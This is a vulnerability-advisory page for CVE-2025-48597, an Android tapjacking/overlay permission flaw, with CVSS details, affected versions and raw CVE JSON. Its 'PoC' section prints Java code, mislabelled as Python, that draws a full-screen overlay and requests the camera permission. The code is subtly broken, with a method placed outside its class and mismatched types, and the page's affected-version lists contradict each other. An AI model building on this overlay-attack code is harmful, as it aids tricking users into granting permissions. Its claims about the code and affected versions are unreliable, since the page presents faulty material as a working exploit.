Security Vulnerability Report
中文
CVE-2025-48597 CVSS 7.8 HIGH

CVE-2025-48597

Published: 2025-12-08 17:16:17
Last Modified: 2025-12-08 19:44:41
Source: [email protected]

Description

In multiple locations, there is a possible way to trick a user into accepting a permission due to a tapjacking/overlay attack. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:google:android:14.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:google:android:15.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:google:android:16.0:*:*:*:*:*:*:* - VULNERABLE
Android Framework < 2025-12-01安全补丁级别
Android 10 (API 29)
Android 11 (API 30)
Android 12 (API 31)
Android 13 (API 33)
Android 14 (API 34)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-48597 PoC - Tapjacking Permission Trick // This PoC demonstrates the overlay attack concept public class TapjackingPOC extends AppCompatActivity { private static final String TAG = "TapjackingPOC"; @Override protected void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); setContentView(R.layout.activity_main); // Create overlay window for tapjacking attack createMaliciousOverlay(); // Trigger permission request that can be hijacked requestSensitivePermission(); } private void createMaliciousOverlay() { WindowManager.LayoutParams params = new WindowManager.LayoutParams( WindowManager.LayoutParams.MATCH_PARENT, WindowManager.LayoutParams.MATCH_PARENT, WindowManager.LayoutParams.TYPE_APPLICATION_OVERLAY, WindowManager.LayoutParams.FLAG_NOT_FOCUSABLE | WindowManager.LayoutParams.FLAG_LAYOUT_IN_SCREEN, PixelFormat.TRANSLUCENT ); // Malicious overlay captures user taps View overlayView = createOverlayView(); WindowManager wm = (WindowManager) getSystemService(WINDOW_SERVICE); wm.addView(overlayView, params); } private View createOverlayView() { // Overlay that tricks users into granting permissions // In real attack, this would intercept system permission dialogs TextView tv = new TextView(this); tv.setText("Tapjacking Overlay Active"); tv.setBackgroundColor(Color.TRANSPARENT); return tv; } private void requestSensitivePermission() { // Request dangerous permission that could be hijacked if (checkSelfPermission(Manifest.permission.CAMERA) != PackageManager.PERMISSION_GRANTED) { requestPermissions(new String[]{Manifest.permission.CAMERA}, 101); } } } // Mitigation: Applications should check FLAG_WINDOW_IS_OBSCURED private boolean isWindowObscured() { Window rootView = getWindow().getDecorView(); if (rootView != null) { IBinder windowToken = rootView.getWindowToken(); try { IWindowManager wm = IWindowManager.Stub.asInterface( ServiceManager.getService("window")); return wm.isWindowObscured(windowToken); } catch (RemoteException e) { Log.e(TAG, "Failed to check window obscured state", e); } } return false; }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-48597", "sourceIdentifier": "[email protected]", "published": "2025-12-08T17:16:16.767", "lastModified": "2025-12-08T19:44:40.860", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In multiple locations, there is a possible way to trick a user into accepting a permission due to a tapjacking/overlay attack. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-1021"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-1021"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:google:android:14.0:*:*:*:*:*:*:*", "matchCriteriaId": "2700BCC5-634D-4EC6-AB67-5B678D5F951D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:google:android:15.0:*:*:*:*:*:*:*", "matchCriteriaId": "8538774C-906D-4B03-A3E7-FA7A55E0DA9E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:google:android:16.0:*:*:*:*:*:*:*", "matchCriteriaId": "2D49E611-5D53-479D-A981-42388FDC0E8D"}]}]}], "references": [{"url": "https://android.googlesource.com/platform/frameworks/base/+/68170bad52250399d2e4a1a8023a3e7aeda1887d", "source": "[email protected]", "tags": ["Patch", "Product"]}, {"url": "https://source.android.com/security/bulletin/2025-12-01", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.